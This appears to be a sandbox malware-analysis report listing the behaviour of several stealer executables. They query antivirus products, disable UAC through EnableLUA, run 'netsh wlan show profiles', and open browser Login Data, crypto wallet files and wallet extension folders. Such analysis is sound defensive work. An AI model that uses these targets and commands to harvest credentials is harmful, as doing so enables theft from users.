Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000235001\toolspub1.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000236001\4767d2e713f2021e8fe856e3ea638b58.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000234001\ISetup8.exe Queries volume information: C:\Users\user\AppData\Local\Temp\u6po.1.zip VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000073001\swiiii.exe VolumeInformation
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Queries volume information: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\u6po.0.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Code function: 9_2_008BD2B0 RegOpenKeyExA,RegQueryValueExA,RegOpenKeyExA,RegQueryValueExA,GetLocalTime,GetTimeZoneInformation,TzSpecificLocalTimeToSystemTime,RegOpenKeyExA,RegQueryValueExA,GetSystemInfo,GlobalMemoryStatusEx,CreateToolhelp32Snapshot,RegOpenKeyExA,RegEnumKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA, 9_2_008BD2B0
Source: C:\Users\user\AppData\Local\Temp\1000020001\d361f35322.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Source: C:\Users\user\AppData\Local\Temp\1000075001\file300un.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System EnableLUA
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: RegAsm.exe, 0000001D.00000002.2278813474.0000000002E44000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000001D.00000002.2274630744.0000000000D77000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter : SELECT * FROM FirewallProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiSpyWareProduct
Source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM FirewallProduct

Stealing of Sensitive Information

Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: 35.0.NewB.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.0.NewB.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 11.2.explorha.exe.930000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 39.2.NewB.exe.e50000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.amert.exe.610000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.1CMweaqlKp.exe.730000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.explorta.exe.700000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000003.1721215690.00000000011E0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000000.2050930258.0000000000E51000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 00000023.00000000.2011865777.0000000000E51000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.1626992485.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000003.1904362561.0000000004F10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.1663910421.0000000000C90000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.1868102298.0000000000611000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.1663899661.0000000000731000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000003.1826787054.0000000004E00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.1732128904.0000000000701000.00000020.00000001.01000000.00000007.sdmp, type: MEMORY
Source: Yara match File source: 00000027.00000002.2069776940.0000000000E51000.00000020.00000001.01000000.00000015.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.1945079164.0000000000931000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.1894101326.0000000005260000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\clip64.dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\cred64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\clip64[1].dll, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000069001\NewB.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\NewB[1].exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll, type: DROPPED
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RegAsm.exe PID: 5348, type: MEMORYSTR
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 40.0.jok.exe.7c0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000028.00000000.2051081332.00000000007C2000.00000002.00000001.01000000.00000018.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: jok.exe PID: 8672, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\1000071001\jok.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\jok[1].exe, type: DROPPED
Source: Yara match File source: 00000024.00000003.2840876152.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839845792.0000000007CE8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001B.00000002.3354975509.0000000008152000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000002.3088709368.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000009.00000002.3082656269.0000000007D70000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839809905.0000000007CCF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2840195887.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000024.00000003.2839878527.0000000007C6E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 5772, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: MPGPH131.exe PID: 6636, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: d361f35322.exe PID: 8200, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: RageMP131.exe PID: 8964, type: MEMORYSTR
Source: Yara match File source: 00000031.00000002.2229022734.0000000003640000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000031.00000002.2229087093.0000000003661000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: decrypted.memstr, type: MEMORYSTR
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 47.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 44.2.swiiii.exe.3cb5570.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 51.3.u6po.0.exe.3680000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0000002C.00000002.2151525456.0000000003CB5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000033.00000003.2152173443.0000000003680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000002F.00000002.2102303995.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Electrum\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\ElectronCash\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\com.liberty.jaxx
Source: RegAsm.exe, 0000001D.00000002.2226894863.0000000000CFB000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: window-state.json
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletRE
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Exodus\exodus.walletRE
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Binance\app-store.jsons8
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\Ethereum\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
Source: d361f35322.exe, 00000009.00000002.3073575028.0000000001456000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: C:\Users\user\AppData\Roaming\MultiDoge\multidoge.wallet
Source: RegAsm.exe, 0000001D.00000002.2196300199.00000000008F7000.00000004.00000010.00020000.00000000.sdmp String found in binary or memory: 5AWallets/ExodusAC:\Users\user\AppData\Roaming\Exodus\exodus.wallet4Y)A%appdata%\Exodus\exodus.walletAkeystore
Source: MPGPH131.exe, 0000001B.00000002.3354809697.0000000007CD7000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: \??\C:\Users\user\AppData\Roaming\Ledger Live
Source: C:\Windows\System32\rundll32.exe Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fihkakfobkmkjojpchpfgcmhfjnmnfpi\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\Application Data\Mozilla\Firefox
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hpglfhgfnhbgpjdenjgmdgoeiappafln
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlbmnnijcnlegkjjpcfjclmcfggfefdm
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\IndexedDB\chrome-extension_cjelfplplebdjjenllpjcblmjkfcffne_0.indexeddb.leveldb\CURRENT
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jbdaocneiiinmjbjlgalhcelgbejmnid
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
Source: C:\Users\user\AppData\Local\RageMP131\RageMP131.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Sync Extension Settings\fnjhmkhhmkbjkkabndcnnogagogbneec\CURRENT
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnmamaachppnkjgnildpdmkaakejnhae
